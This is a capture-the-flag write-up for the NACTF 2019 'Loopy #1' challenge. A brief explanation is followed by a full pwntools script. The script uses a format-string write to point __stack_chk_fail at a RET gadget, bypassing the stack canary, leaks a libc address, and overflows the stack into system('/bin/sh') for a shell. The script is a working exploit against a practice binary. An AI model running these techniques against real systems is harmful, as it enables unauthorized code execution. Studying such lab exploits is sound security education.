Loopy #1
Binary Exploitation - Points: 500
Same program as Loopy #0, but someone’s turned on the stack protector now!
Connect at
nc shell.2019.nactf.com 31732
Compared to the previous challenge we have now stack canaries enabled. We can use another format string to modify the address of the __stack_chk_fail function, that is called when the canary value is corrupted, and point it to a RET gadget what effectively disables the canary check. The rest is basically identical to the previous challenge.
from pwn import *
libc = ELF('libc.so.6')
libc_printf = libc.symbols['printf']
system = libc.symbols['system']
shell = next(libc.search('/bin/sh'))
e = ELF('loopy-1')
vuln = e.symbols['vuln']
__stack_chk_fail = e.got['__stack_chk_fail']
printf = e.got['printf']
r = ROP('loopy-1')
ret = r.find_gadget(['ret'])[0]
# p = remote('shell.2019.nactf.com', 31283)
p = process('./loopy-1')
print p.recvuntil('>')
format_string = fmtstr_payload(7, {__stack_chk_fail: ret})
payload = format_string + 'A' * (64 - len(format_string)) + 'A' * 16 + p32(vuln)
p.sendline(payload)
print p.recvuntil('>')
payload = p32(printf) + '%7$s' + 'A' * 56 + 'A' * 16 + p32(vuln)
p.sendline(payload)
print p.recvuntil('You typed: ')
p.recv(4)
leak = u32(p.recv(4))
log.info("leak: " + hex(leak))
libc_base = leak - libc_printf
system = libc_base + system
shell = libc_base + shell
log.info("system @ " + hex(system))
log.info("shell @ " + hex(shell))
print p.recvuntil('>')
payload = 'A' * 80 + p32(system) + p32(0x0) + p32(shell)
p.sendline(payload)
p.interactive()